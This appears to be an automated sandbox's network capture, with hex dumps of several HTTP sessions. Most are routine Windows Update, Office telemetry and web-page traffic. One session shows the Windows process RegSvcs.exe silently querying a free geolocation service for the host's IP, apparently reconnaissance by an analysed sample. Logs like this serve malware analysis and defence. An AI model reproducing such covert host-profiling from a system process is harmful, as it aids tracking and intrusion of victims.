                                                                                                                                                                                                                                                    2024-10-29 12:08:13 UTC14994INData Raw: 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 68 61 74 20 68 61 70 70 65 6e 65 64 20 74 6f 20 74 68 65 20 6f 6c 64 20 5a 58 51 20 77 65 62 73 69 74 65 3f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 46 6f 72 20 5a 58 51 2e 6e 65 74 20 53 75 62 64 6f 6d 61 69 6e 20 4f 77 6e 65 72 73 20 54 68 65 20 6f 6c 64 20 5a 58 51 20 77 65 62 73 69 74 65 20 68 61 64 20 62 65 65 6e 20 73 68 75 74 20 64 6f 77 6e 20 62 79 20 74 68
                                                                                                                                                                                                                                                    Data Ascii: /><meta property="og:type" content="article" /><meta property="og:title" content="What happened to the old ZXQ website?" /><meta property="og:description" content="Information For ZXQ.net Subdomain Owners The old ZXQ website had been shut down by th
                                                                                                                                                                                                                                                    2024-10-29 12:08:13 UTC16384INData Raw: 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2e 30 35 65 6d 3b 20 7d 0a 2e 6e 61 76 69 67 61 74 69 6f 6e 2d 6d 61 69 6e 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 6c 69 20 61 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 7d 0a 2e 6e 61 76 69 67 61 74 69 6f 6e 2d 6d 61 69 6e 20 7b 20 2d 2d 6e 61 76 2d 69 74 65 6d 73 2d 73 70 61 63 65 3a 20 33 33 70 78 3b 20 7d 0a 2e 73 2d 6c 69 67 68 74 20 2e 6e 61 76 69 67 61 74 69 6f 6e 2d 6d 61 69 6e 20 7b 20 2d 2d 63 2d 6e 61 76 3a 20 23 30 30 30 30 30 30 3b 20 7d 0a 2e 73 2d 6c 69 67 68 74 20 2e 6e 61 76 69 67 61 74 69 6f 6e 20 7b 20 2d 2d 63 2d 6e 61 76 2d 62 6c 69 70 3a 20 76 61 72
                                                                                                                                                                                                                                                    Data Ascii: -weight: bold; text-transform: uppercase; letter-spacing: .05em; }.navigation-main .menu > li li a { font-size: 14px; }.navigation-main { --nav-items-space: 33px; }.s-light .navigation-main { --c-nav: #000000; }.s-light .navigation { --c-nav-blip: var
                                                                                                                                                                                                                                                    2024-10-29 12:08:13 UTC16384INData Raw: 71 2e 6e 65 74 2f 22 20 74 69 74 6c 65 3d 22 5a 58 51 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6c 69 6e 6b 20 74 73 2d 6c 6f 67 6f 20 6c 6f 67 6f 2d 69 73 2d 69 6d 61 67 65 22 3e 0a 09 09 3c 73 70 61 6e 3e 0a 09 09 09 0a 09 09 09 09 0a 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 7a 78 71 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 30 32 2f 5a 58 51 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 69 6d 61 67 65 22 20 61 6c 74 3d 22 5a 58 51 22 20 77 69 64 74 68 3d 22 32 30 33 22 20 68 65 69 67 68 74 3d 22 36 36 22 2f 3e 0a 09 09 09 09 09 09 09 09 09 20 0a 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 3c 2f 61 3e 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09
                                                                                                                                                                                                                                                    Data Ascii: q.net/" title="ZXQ" rel="home" class="logo-link ts-logo logo-is-image"><span><img src="https://zxq.net/wp-content/uploads/2022/02/ZXQ.png" class="logo-image" alt="ZXQ" width="203" height="66"/> </span></a></div>
                                                                                                                                                                                                                                                    2024-10-29 12:08:13 UTC8455INData Raw: 6f 73 74 2d 6d 65 74 61 20 70 6f 73 74 2d 6d 65 74 61 2d 61 20 70 6f 73 74 2d 6d 65 74 61 2d 6c 65 66 74 20 68 61 73 2d 62 65 6c 6f 77 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 73 2d 74 69 74 6c 65 20 70 6f 73 74 2d 74 69 74 6c 65 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 78 71 2e 6e 65 74 2f 63 75 73 74 6f 6d 69 7a 61 62 6c 65 2d 6f 6e 6c 69 6e 65 2d 67 61 6d 65 73 2d 61 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 67 61 6d 69 6e 67 2d 65 78 70 65 72 69 65 6e 63 65 2f 22 3e 43 75 73 74 6f 6d 69 7a 61 62 6c 65 20 4f 6e 6c 69 6e 65 20 47 61 6d 65 73 3a 20 41 20 50 65 72 73 6f 6e 61 6c 69 7a 65 64 20 47 61 6d 69 6e 67 20 45 78 70 65 72 69 65 6e 63 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 74 2d 6d 65 74
                                                                                                                                                                                                                                                    Data Ascii: ost-meta post-meta-a post-meta-left has-below"><div class="is-title post-title"><a href="https://zxq.net/customizable-online-games-a-personalized-gaming-experience/">Customizable Online Games: A Personalized Gaming Experience</a></div><div class="post-met
                                                                                                                                                                                                                                                    2024-10-29 12:08:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    9192.168.2.549725188.114.97.34435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:14 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                    2024-10-29 12:08:14 UTC887INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:14 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 11204
                                                                                                                                                                                                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RlROmw529%2BqQbAluNMk7hCdyVxFJeiW4TuIqLhNdaRmkeFt3hWiyRsU6OW59nYfvgBhqWK3nObqOUJt0JKNT1kiPb8yxr%2B10lDXWjTyD3WzIhDowkmG%2FO53DP8kGQIh%2FPl6FCpm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8da30cc29883e817-DFW
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1973&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1461150&cwnd=251&unsent_bytes=0&cid=5870e7fb8604073a&ts=268&x=0"
                                                                                                                                                                                                                                                    2024-10-29 12:08:14 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    10192.168.2.54972420.109.210.53443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:15 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VatNPFTcculonAy&MD=pDKKvD8Y HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                    2024-10-29 12:08:15 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                    MS-CorrelationId: 5c90413a-3fc4-4a43-afdf-e89ea3d64080
                                                                                                                                                                                                                                                    MS-RequestId: ed1f1387-f680-4e5c-8e9a-8d281297d0f4
                                                                                                                                                                                                                                                    MS-CV: OjSoIGyEfk2yx6od.0
                                                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:14 GMT
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                                                                                    2024-10-29 12:08:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                    2024-10-29 12:08:15 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    11192.168.2.54972913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:16 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:17 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                    Content-Length: 218853
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public
                                                                                                                                                                                                                                                    Last-Modified: Mon, 28 Oct 2024 13:23:36 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DCF753BAA1B278"
                                                                                                                                                                                                                                                    x-ms-request-id: 174434da-801e-0015-686a-29f97f000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120817Z-16849878b78hh85qc40uyr8sc800000006rg00000000banw
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                                                                                                                                                    Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                                                                                                                                                    Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                                                                                                    Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                                                                                                                                                    Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                                                                                                                                                    Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                                                                                                                                                    Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
